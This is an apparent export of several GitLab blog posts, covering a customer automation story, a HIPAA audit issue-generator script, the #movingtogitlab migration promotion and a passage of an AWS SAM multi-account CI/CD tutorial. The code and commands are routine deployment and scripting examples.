The services that were available …\nIt was really easy to figure out what we needed to do.\nAnd your support has been a big help as well in enabling us to rapidly deliver and stand up these environments.\n\n\"Before, some of our processes were manual, like uploading code scans to Fortify.\nWe’ve automated all of that now on specific branches of the software that we’re building.\nSo, it’s taken out those manual processes that had to go through the checks.\nWhen we build a mobile application and push it through the pipeline, we’re working on how can we automatically publish that to MDM.\nSo, as soon as that code is checked in, scanned, what’s the process to get that into production?\nAnd that’s where we’ve focused a lot of effort of just entirely automation.\"\n\n## Automate all.the.things.\n\n\"Our collective vision within Monkton, and working with you at GitLab, and all these other companies, is how do we automate and take out human error from the equation?\nOur goal is that the moment code is checked in and has been reviewed, the testing lifecycle, the deployment lifecycle, the security vulnerability scanning lifecycle, should all be automated.\nSo, it’s more of humans reviewing reports at the end versus humans having to do the inspections themselves. We really envisioned that these tools could do a much better job than humans can.\n\n\"We’re not trying to replace human jobs. But how can we free people up to do what people do best, versus laborious efforts like pen testing mobile applications or pen testing web applications?\nA lot of that can be automated through scripting tools – Amazon Device Farm – all of which GitLab can automate and push out.\nSo, we’re focusing on what tools can we bring in to automate that process, tie them into GitLab, and automate everything. 
Or virtually everything.\"\n\n## Repeatability is key\n\n\"Repeatability is probably from our vantage point, one of the cornerstones of what we have to be able to do.\nIf we have a Department of Defense customer that builds a hundred mobile apps using our software, and they discover a vulnerability in one of them – if there’s not a repeatable process to build and deliver the solutions, it would take a year to update those hundred mobile apps if they’re doing it in a very siloed environment.\nBut with a repeatable process, they could change it out once and propagate it out, they can patch and push everything within an hour.\nA repeatable process allows you to have repeatable, consistent outcomes every single time, so you know that you can trust the process as part of your security program versus maybe a hodge podge of different tools and manual processes.\"\n\n## Lessons from the migration process\n\n\"It’s been a learning opportunity for us to see what are the best practices that we can collectively share – even with you at GitLab, there might be things that we’re all collectively learning, that we can use to help the community together.\nBecause this isn’t just a proprietary company effort on our end and your end, or even our customers’ end.\nI look at it as a good learning experience for all of us to improve processes, security, compliance, and everything that goes along with that.\"\n\nHere's a bit more from our chat with Harold:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/kT5qZ8W7yXM\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nVideo produced by [Aricka Flowers](/company/team/#arickaflowers)\n{: .note}\n",[267,231,9,910],{"slug":3987,"featured":6,"template":689},"monkton-moves-to-gitlab-customer-story","content:en-us:blog:monkton-moves-to-gitlab-customer-story.yml","Monkton Moves To Gitlab Customer 
Story","en-us/blog/monkton-moves-to-gitlab-customer-story.yml","en-us/blog/monkton-moves-to-gitlab-customer-story",{"_path":3993,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3994,"content":4000,"config":4006,"_id":4008,"_type":14,"title":4009,"_source":16,"_file":4010,"_stem":4011,"_extension":19},"/en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol",{"title":3995,"description":3996,"ogTitle":3995,"ogDescription":3996,"noIndex":6,"ogImage":3997,"ogUrl":3998,"ogSiteName":673,"ogType":674,"canonicalUrls":3998,"schema":3999},"Moving workflows to GitLab: The case of the HIPAA Audit Protocol","With the GitLab API, you can easily move workflows into GitLab. Here’s how we did it for the HIPAA Audit Protocol.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679716/Blog/Hero%20Images/bright-cardiac-cardiology.jpg","https://about.gitlab.com/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Moving workflows to GitLab: The case of the HIPAA Audit Protocol\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Luka Trbojevic\"}],\n        \"datePublished\": \"2019-07-25\",\n      }",{"title":3995,"description":3996,"authors":4001,"heroImage":3997,"date":4003,"body":4004,"category":801,"tags":4005},[4002],"Luka Trbojevic","2019-07-25","\n\nUsing GitLab for just about everything we do, I’ve seen firsthand how powerful and effective\nit can be as a project management tool.\n\n**However, in speaking with folks about adopting GitLab for their own non-development\nworkflows, the most common roadblock I hear is the lack of specific examples.** If you're not\na developer or otherwise don't work with GitLab often, it can be hard to see how all the\nfeatures and capabilities fit together to go from an idea to a functional workflow. 
Because\nof this, I thought it was important to create a specific, real-world example for something most\nfolks can relate to: an audit.\n\nThe [HIPAA Audit Protocol](https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/audit/protocol/index.html)\nis published by the U.S. Department of Health & Human Services and is used by the\nOffice for Civil Rights as part of its HIPAA compliance enforcement efforts. The\nHIPAA Audit Protocol currently exists as a table on the HHS website and is most commonly turned\ninto a spreadsheet. But there are limitations and inefficiencies to working with an audit\nprotocol in a spreadsheet, as compared to GitLab:\n\n* Collaboration is challenging in a spreadsheet. With issues, robust and well-organized conversations are easy.\n* You can't upload audit protocol files directly to the spreadsheet. With issues, you can upload files directly.\n* There's no simple, clean way to maintain a full, comprehensive change history in a\nspreadsheet. With issues and merge requests, change history and logging is directly built in.\n* It can be challenging to manage due dates, milestones, and work assignments in a\nspreadsheet. With issues, those are all native features.\n\n## Introducing the HIPAA Audit Protocol Issue Generator\n\nThe HIPAA Audit Protocol Issue Generator is a simple Python script using the\n`python-gitlab` API wrapper to create issues out of every audit inquiry in the protocol.\nThe purpose of the script is to highlight how easy it is to use the GitLab API to move\nworkflows inside of GitLab and leverage GitLab's project management capabilities.\n\nThe best part? Creating this tool was really easy and simple. I started by copying the\nHTML table of the audit protocol into a CSV. Then I wrote a simple loop to go through each\nrow in the CSV and automatically create an associated issue. 
Note: While you can use the\nissue importer, you’d have to create a very strictly structured and formatted import file.\nWith the GitLab API, you have more flexibility and the output is easier to work with.\n\nFor your use, we’ve made\nthe [full script and a CSV of the audit protocol](https://gitlab.com/ltrbojevic/hipaa-audit-protocol-issue-generator)\navailable.\n\nHere’s what an issue looks like:\n\n![sample issue](https://about.gitlab.com/images/blogimages/HIPAA-audit-protocol-example.png){: .shadow.medium.center}\n\nAll the information you need is front and center and the issues are labeled.\n{: .note.text-center}\n\n### Customizing the issue structure\n\nFirst, it’s important to understand how we load the data from the CSV. There are different\nways to do it, but I like to assign every column in the CSV to a variable, then pass that\nvariable to the issue create API call. For this script, we have:\n\n```\naudit_type = col[0]\nsection = col[1]\nkey_activity = col[2]\nestablished_performance_criteria = col[3]\naudit_inquiry = col[4]\nrequired_addressable = col[5]\n```\n\nThat means `audit_type` is the first column, `section` is the second column, and so on.\n\nThese variables then get used in the issue create API call. For this script, we have:\n\n```\nissue = project.issues.create({'title': key_activity,\n'description': '## Established Performance Criteria' + '\\n' +\nestablished_performance_criteria + '\\n' + '## Audit Inquiry' +\n'\\n' + audit_inquiry,\n'labels': [audit_type] + [required_addressable] + [section]})\n```\n\n#### Title\n\nI decided to use the respective Key Activity of every audit inquiry. In the issue create API\ncall, it looks like this:\n\n` ‘title’: key_activity, `\n\nYou can make the title anything you want. 
In this case I just used a column from the CSV, but I\ncould start or end the title with some other text not in the CSV, like:\n\n` ‘title’: Any text you want:’ + ‘ ‘ key_activity, `\n\n#### Description\n\nI just used a string to manually write out the headers for the section and filled the sections\nusing the data from the CSV. In the issue create API call, it looks like this:\n\n` 'description': '## Established Performance Criteria' + '\\n' + established_performance_criteria + '\\n' + '## Audit Inquiry' + '\\n' + audit_inquiry, `\n\nNotice how I use the newline. Without the newline, all of the data would be added to the description\nright next to each other and it would be unreadable. You can add as many newlines as you want,\nand if you’re planning on doing regular editing of the issue description itself, consider\nadding two newlines to create a new paragraph so the issue description is more readable in edit mode.\n\n#### Labels\n\nLabels are very helpful for organizing, searching, filtering, and creating boards. For the labels,\nI opted to use Audit Type and Section. In the issue create API call, it looks like this:\n\n` 'labels': [audit_type] + [required_addressable] + [section] `\n\nYou can also add your own labels to the CSV by creating a new column and adding the labels you\nwant for every given row, or you can add a static label applied to all the issues by adding it\nto the API call. Make sure to keep the variables in brackets or the string will split\n(for example, instead of `Privacy` it will create a label for each letter in the word `Privacy`).\n\n#### Adding other sections\n\nYou can customize the script to add any other sections allowable by\nthe [GitLab API](https://docs.gitlab.com/ee/api/). Because we’re working with issues,\nthe [GitLab Issues API](https://docs.gitlab.com/ee/api/issues.html) documentation will be\nhelpful. 
The [`python-gitlab` documentation](https://python-gitlab.readthedocs.io/en/stable/index.html) is\nalso a great resource, given that this script makes use of it.\n\n## Making your own workflows in GitLab\n\nWhile in this blog post I've focused on the HIPAA Audit Protocol and the issue generator\nscript, it is also a practical, hands-on example of how simple it is to use the\nGitLab API to move any workflow to GitLab. There are two primary components:\n\n1. A data source (I prefer CSV files)\n2. A crafted API call to use the data source to bring the data into GitLab\n\nI think of the data source as the thing I want in GitLab and the crafted API call as the\nvehicle to get it into GitLab. Think of a row in your CSV as an issue and the columns as the\nthings you’re putting in the issue.\n\nWhile my specific example was the audit protocol, we can use this strategy for just about anything.\nSome examples are risk assessments, gap analyses, event planning, product launches, and more.\n\nTo adapt this script for other workflows:\n1. Start by getting your data into a CSV. Be sure to remove your headers before running the script\nbecause the script doesn’t account for column headers as is!\n2. Modify the variables and issue create API call we talked about in\nthe [Customizing the issue structure section above](#customizing-the-issue-structure) to match with your CSV and data.\n\nAnd that’s really it!\n\nAt GitLab, we use the\n[simplest and most boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions)\nto solve problems. With this approach, we were able to turn an HTML table of the HIPAA Audit Protocol\non the HHS website into a functional workflow within GitLab in just a few\nhours (including API research time and CSV formatting) and in 42 lines of code (including comments).\nTo add to that, the script can be repurposed for just about any other workflow. 
Plus, the script is\navailable for anyone to download, use, and modify in any way, and this blog post can serve as a\nguide on how to do that.\n\nAs a long-term solution to bring this functionality into\nGitLab as a feature, there’s also an\n[open issue to collect feedback on creating\na marketplace for issue templates](https://gitlab.com/gitlab-org/gitlab-ce/issues/62895). If you have any suggestions or comments about the marketplace\nidea, feel free to post them in the issue!\n\nHave a specific question you want answered or want to get feedback on a specific use case? Comment below!\n\n### Disclaimer\nTHE INFORMATION PROVIDED ON THIS WEBSITE IS TO BE USED FOR INFORMATIONAL PURPOSES ONLY. THE\nINFORMATION SHOULD NOT BE RELIED UPON OR CONSTRUED AS LEGAL OR COMPLIANCE ADVICE OR OPINIONS.\nTHE INFORMATION IS NOT COMPREHENSIVE AND WILL NOT GUARANTEE COMPLIANCE WITH ANY REGULATION OR\nINDUSTRY STANDARD. YOU MUST NOT RELY ON THE INFORMATION FOUND ON THIS WEBSITE AS AN\nALTERNATIVE TO SEEKING PROFESSIONAL ADVICE FROM YOUR ATTORNEY AND/OR COMPLIANCE PROFESSIONAL.\n{: .note}\n\nPhoto by [Pixabay](https://www.pexels.com/photo/bright-cardiac-cardiology-care-433267/) on [Pexels](https://www.pexels.com)\n{: .note}\n",[803,9,865],{"slug":4007,"featured":6,"template":689},"moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol","content:en-us:blog:moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol.yml","Moving Workflows To Gitlab The Case Of The Hipaa Audit 
Protocol","en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol.yml","en-us/blog/moving-workflows-to-gitlab-the-case-of-the-hipaa-audit-protocol",{"_path":4013,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4014,"content":4019,"config":4023,"_id":4025,"_type":14,"title":4026,"_source":16,"_file":4027,"_stem":4028,"_extension":19},"/en-us/blog/movingtogitlab",{"title":4015,"description":4016,"ogTitle":4015,"ogDescription":4016,"noIndex":6,"ogImage":3978,"ogUrl":4017,"ogSiteName":673,"ogType":674,"canonicalUrls":4017,"schema":4018},"#movingtogitlab","People are #movingtogitlab. New users can get 75% off on Gold or Ultimate for one year.","https://about.gitlab.com/blog/movingtogitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"#movingtogitlab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-03\",\n      }",{"title":4015,"description":4016,"authors":4020,"heroImage":3978,"date":3849,"body":4021,"category":299,"tags":4022},[970],"\n\nWith the recent news of [Microsoft's acquisition of GitHub](https://www.bloomberg.com/news/articles/2018-06-03/microsoft-is-said-to-have-agreed-to-acquire-coding-site-github), we've seen a trend of #movingtogitlab which now has [more than 1,000 tweets](https://twitter.com/movingtogitlab).\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Stats on how Twittersphere is responding to reports that \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> is about to be acquired by \u003Ca href=\"https://twitter.com/Microsoft?ref_src=twsrc%5Etfw\">@Microsoft\u003C/a> .\u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> and \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> are the most popular in GitHub 
mentioned tweets, unsurprisingly \u003Ca href=\"https://t.co/dt9ZdoTQBI\">pic.twitter.com/dt9ZdoTQBI\u003C/a>\u003C/p>&mdash; Vicinitas 📈: Hashtag &amp; Keyword Tracking (@vicinitas_io) \u003Ca href=\"https://twitter.com/vicinitas_io/status/1003431925237760000?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\nWe're also seeing a massive increase in projects migrating to GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re seeing 10x the normal daily amount of repositories \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://t.co/7AWH7BmMvM\">https://t.co/7AWH7BmMvM\u003C/a> We&#39;re scaling our fleet to try to stay up. Follow the progress on \u003Ca href=\"https://t.co/hN0ce379SC\">https://t.co/hN0ce379SC\u003C/a> and \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003409836170547200?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cdiv class=\"row\">\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/projects-created.png\" alt=\"Projects created in GitLab\">\n\u003C/div>\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/github-imports-chart.png\" alt=\"GitHub imports to GitLab\">\n\u003C/div>\n\u003Cdiv class=\"col-md-12 text-center\" style=\"margin-top: 5px\">\n\u003C/div>\n\u003C/div>\n\n## Why are people #movingtogitlab?\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">I love \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>, 
the integration between code repository, documentation management, issue tracking and CI/CD is seamless ... and free. \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> moving to Microsoft could be huge for GitLab \u003Ca href=\"https://t.co/t9Jzyf9dmV\">https://t.co/t9Jzyf9dmV\u003C/a>\u003C/p>&mdash; Oli Young (@oliyoung) \u003Ca href=\"https://twitter.com/oliyoung/status/1003408661815836672?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Even if you go with \u003Ca href=\"https://t.co/e5iMjTswKf\">https://t.co/e5iMjTswKf\u003C/a> at first, the fact you’re able to quickly run your own GitLab CE install and migrate from \u003Ca href=\"https://t.co/e5iMjTswKf\">https://t.co/e5iMjTswKf\u003C/a> is crucial.\u003C/p>&mdash; Matt Lee (@mattl) \u003Ca href=\"https://twitter.com/mattl/status/1003437203480072192?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">GitLab also ranks very highly on the FSF ethical criteria evaluation. \u003Ca href=\"https://t.co/oHvmNQqA1u\">https://t.co/oHvmNQqA1u\u003C/a>\u003C/p>&mdash; Matt Lee (@mattl) \u003Ca href=\"https://twitter.com/mattl/status/1003437206462136324?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">No problem, I mean what&#39;s not to love? You improve consistently, you listen to the community and you make using your platform feel like you&#39;re a part of something special. 
I support you all the way, I have no need to be \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> as I&#39;ve used \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> for nearly 2 years now\u003C/p>&mdash; LTN Games (@LTNGames) \u003Ca href=\"https://twitter.com/LTNGames/status/1003079862058409984?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\n## How to move to GitLab\n\nWe've tried to make it as simple as possible to migrate your projects from GitHub to GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Had planned to spend the day moving our repos from \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> following the MS rumours.. 
turns out  it took &lt; 5 minutes 😂 swish 👍🏻🦄 time for beer 👍🏻 \u003Ca href=\"https://twitter.com/hashtag/devops?src=hash&amp;ref_src=twsrc%5Etfw\">#devops\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/git?src=hash&amp;ref_src=twsrc%5Etfw\">#git\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/winning?src=hash&amp;ref_src=twsrc%5Etfw\">#winning\u003C/a>\u003C/p>&mdash; Aperitif (@AperitifIO) \u003Ca href=\"https://twitter.com/AperitifIO/status/1003005028590936064?ref_src=twsrc%5Etfw\">June 2, 2018\u003C/a>\u003C/blockquote>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">It literally takes only 2 clicks to move to GitLab \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; Pablo (@PablockMS) \u003Ca href=\"https://twitter.com/PablockMS/status/1003385604569223168?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\nYou can read through the [documentation](https://docs.gitlab.com/ee/user/project/import/github.html) or watch the step-by-step video below.\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/VYOXuOg9tQI\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\n## New users get a 75% discount on GitLab's top tier plans\n\nNew GitLab users can get 75 percent off [GitLab Ultimate](/pricing/) or [Gold](/pricing/#gitlab-com) for one year. GitLab Ultimate is our top-tier self-managed offering, and GitLab Gold is our top-tier SaaS offering hosted by GitLab.com. To qualify you have to:\n\n1. Be a new user of GitLab.\n1. 
Send a [tweet that includes #movingtogitlab](https://twitter.com/intent/tweet?text=I%27m%20%23movingtogitlab) from your account before Wednesday, June 6, 11:59pm Pacific time.\n1. Send an email to [movingtogitlab@gitlab.com](mailto:movingtogitlab@gitlab.com) with a link to the tweet.\n1. We will send you a discount code or a quote document that can be executed by you.\n1. You need to place an order at or before Saturday, June 30, 11:59pm Pacific time.\n",[9,930],{"slug":4024,"featured":6,"template":689},"movingtogitlab","content:en-us:blog:movingtogitlab.yml","Movingtogitlab","en-us/blog/movingtogitlab.yml","en-us/blog/movingtogitlab",{"_path":4030,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4031,"content":4037,"config":4043,"_id":4045,"_type":14,"title":4046,"_source":16,"_file":4047,"_stem":4048,"_extension":19},"/en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci",{"title":4032,"description":4033,"ogTitle":4032,"ogDescription":4033,"noIndex":6,"ogImage":4034,"ogUrl":4035,"ogSiteName":673,"ogType":674,"canonicalUrls":4035,"schema":4036},"How to set up multi-account AWS SAM deployments with GitLab CI/CD","Our guest author, an AWS Serverless hero, shares how to automate SAM deployments using GitLab CI/CD.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666959/Blog/Hero%20Images/gitlab-aws-cover.png","https://about.gitlab.com/blog/multi-account-aws-sam-deployments-with-gitlab-ci","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to set up multi-account AWS SAM deployments with GitLab CI/CD\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Forrest Brazeal\"}],\n        \"datePublished\": \"2019-02-04\",\n      }",{"title":4032,"description":4033,"authors":4038,"heroImage":4034,"date":4040,"body":4041,"category":801,"tags":4042},[4039],"Forrest Brazeal","2019-02-04","\nI've been working with [serverless](/topics/serverless/) applications in 
AWS for about three years – that makes me an old salt in serverless terms! So I know that deploying and maintaining a serverless app can be tricky; the tooling often has critical gaps.\n\nAWS's [SAM (Serverless Application Model)](https://aws.amazon.com/serverless/sam/) is an open source framework that makes it easier to define AWS resources – such as Lambda functions, API Gateway APIs and DynamoDB tables – commonly used in serverless applications. Once you lay out your app in a SAM template, the next thing you need is a consistent, repeatable way to get that template off your laptop and deployed in the cloud.\n\nYou need CI/CD.\n\nI've used several different [CI/CD systems](/topics/ci-cd/) to automate SAM deployments, and I always look for the following features:\n\n- A single deployment pipeline that can build once and securely deploy to multiple AWS accounts (dev, staging, prod).\n- Dynamic feature branch deployments, so serverless devs can collaborate in the cloud without stepping on each other.\n- Automated cleanup of feature deployments.\n- Review of our SAM application directly integrated with the CI/CD tool's user interface.\n- Manual confirmation before code is released into production.\n\nIn this post, we'll find out how [GitLab CI](/solutions/continuous-integration/) can check these boxes on its way to delivering effective CI/CD for AWS SAM. You can follow along using [the official example code, available here](https://gitlab.com/gitlab-examples/aws-sam).\n\n## Multi-account AWS deployments\n\nWe'll want to set up our deployment pipeline across multiple AWS accounts, because accounts are the only true security boundary in AWS. We don't want to run any risk of deploying prod data in dev, or vice versa. Our multi-account setup will look something like this:\n\nAny time we work with multiple AWS accounts, we need cross-account [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) in order to authorize deployments. 
We'll handle this task through the following steps. (All referenced scripts are available in the [example repo](https://gitlab.com/gitlab-examples/aws-sam))\n\n### 1\. Establish three AWS accounts for development, staging, and production deployments\n\nYou can use existing AWS accounts if you have them, or [provision new ones under an AWS Organization](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_create.html).\n\n### 2\. Set up GitLab IAM roles in each account\n\nRun the following AWS CLI call with admin credentials in each of the three accounts:\n\n```\naws cloudformation deploy --stack-name GitLabCIRoles --template-file setup-templates/roles.yml --capabilities CAPABILITY_NAMED_IAM --parameter-overrides CIAccountID=\"\u003CAWS Account ID where your GitLab CI/CD runner lives>\" CIAccountSTSCondition=\"\u003CThe aws:userid for the IAM principal used by the GitLab runner>\"\n  ```\n\nReplace `CIAccountID` and `CIAccountSTSCondition` as indicated with values from the AWS account where your GitLab CI/CD runner exists. (Need help finding the `aws:userid` for your runner’s IAM principal? Check out [this guide](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_variables.html#principaltable).)\n\nThis CloudFormation template defines two roles: `SharedServiceRole` and `SharedDeploymentRole`. The `SharedServiceRole` is assumed by the GitLab CI/CD runner when calling the AWS CloudFormation service. This role trusts the GitLab CI/CD runner's role. It has permissions to call the CloudFormation service, pass a role via IAM, and access S3 and CloudFront: nothing else. This role is not privileged enough to do arbitrary AWS deployments on its own.\n\nThe `SharedDeploymentRole`, on the other hand, has full administrative access to perform any AWS action. As such, it cannot be assumed directly by the GitLab CI/CD runner. Instead, this role must be \"passed\" to CloudFormation using the service's `RoleArn` parameter. 
The CloudFormation service trusts the `SharedDeploymentRole` and can use it to deploy whatever resources are needed as part of the pipeline.\n\n### 3\. Create an S3 bucket for CI artifacts\n\nGrab the AWS account ID for each of your development, staging, and production accounts, then deploy this CloudFormation template **in the account where your GitLab CI/CD Runner exists**:\n\n`aws cloudformation deploy --stack-name GitLabCIBucket --template-file setup-templates/ci-bucket.yml --parameter-overrides DevAwsAccountId=\"\u003CAWS Account ID for dev>\" StagingAwsAccountId=\"\u003CAWS Account ID for staging>\" ProdAwsAccountId=\"\u003CAWS Account ID for prod>\" ArtifactBucketName=\"\u003CA unique name for your bucket>\"`\n\nThis CloudFormation template creates a centralized S3 bucket which holds the artifacts created during your pipeline run. Artifacts are created once for each branch push and reused between staging and production. The bucket policy allows the development, staging, and production accounts to reference the same artifacts when deploying CloudFormation stacks -- checking off our \"build once, deploy many\" requirement.\n\n### 4\. Assume the `SharedServiceRole` before making any cross-account AWS calls\nWe have provided the script `assume-role.sh`, which will assume the provided role and export temporary AWS credentials to the current shell. It is sourced in the various `.gitlab-ci.yml` build scripts.\n\n## Single deployment pipeline\n\nThat brings us to the `.gitlab-ci.yml` file you can see at the root of our example repository. GitLab CI/CD is smart enough to dynamically create and execute the pipeline based on that template when we push code to GitLab. 
The file has a number of variables at the top that you can tweak based on your environment specifics.\n\n### Stages\n\nOur Gitlab CI/CD pipeline contains seven possible stages, defined as follows:\n\n![Multi-account AWS SAM deployment model with GitLab CI](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/deployment-model.png){: .shadow.medium.center}\n\n```yaml\nstages:\n - test\n - build-dev\n - deploy-dev\n - build-staging\n - deploy-staging\n - create-change-prod\n - execute-change-prod\n```\n\n![Deployment lifecycle stages](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/deployment-lifecycle-stages.png){: .shadow.medium.center}\n\n\"Stages\" are used as a control flow mechanism when building the pipeline. Multiple build jobs within a stage will run in parallel, but all jobs in a given stage must complete before any jobs belonging to the next stage in the list can be executed.\n\nAlthough seven stages are defined here, only certain ones will execute, depending on what kind of Git action triggered our pipeline. We effectively have three stages to any deployment: a \"test\" phase where we run unit tests and dependency scans against our code, a \"build\" phase that packages our SAM template, and a \"deploy\" phase split into two parts: creating a [CloudFormation change set](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-updating-stacks-changesets.html) and then executing that change set in the target environment.\n\n#### Test\n\nOur `.gitlab-ci.yml` file currently runs two types of tests: unit tests against our code, and dependency scans against our third-party Python packages.\n\n##### Unit tests\n\nUnit tests run on every branch pushed to the remote repository. 
This behavior is defined by the `only: branches` property in the job shown below:\n\n```yaml\ntest:unit:\n stage: test\n only:\n   - branches\n script: |\n   if test -f requirements.txt; then\n       pip install -r requirements.txt\n   fi\n   python -m pytest --ignore=functions/\n```\n\nEvery GitLab CI/CD job runs a script. Here, we install any dependencies, then execute Python unit tests.\n\n##### Dependency scans\n\n[Dependency scans](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), which can take a few minutes, run only on code pushed to the master branch; it would be counterproductive for developers to wait on them every time they want to test code.\n\nThese scans use a hardcoded, standard Docker image to mount the code and run \"Docker in Docker\" checks against a database of known package vulnerabilities. If a vulnerability is found, the pipeline will log the error without stopping the build (that's what the `allow-failure: true` property does).\n\n#### Build\n\nThe build stage turns our SAM template into CloudFormation and turns our Python code into a valid AWS Lambda deployment package. For example, here's the `build:dev` job:\n\n```yaml\nbuild:dev:\n stage: build-dev\n \u003C\u003C: *build_script\n variables:\n   \u003C\u003C: *dev_variables\n artifacts:\n   paths:\n     - deployment.yml\n   expire_in: 1 week\n only:\n   - branches\n except:\n   - master\n```\n\nWhat's going on here? Note first the combination of `only` and `except` properties to ensure that our development builds happen only on pushes to branches that aren't `master`. We're referring to `dev_variables`, the set of development-specific variables defined at the top of `.gitlab-ci.yml`. And we're running a script, pointed to by `build_script`, which packages our SAM template and code for deployment using the `aws cloudformation package` CLI call.\n\nThe artifact `deployment.yml` is the CloudFormation template output by our package command. 
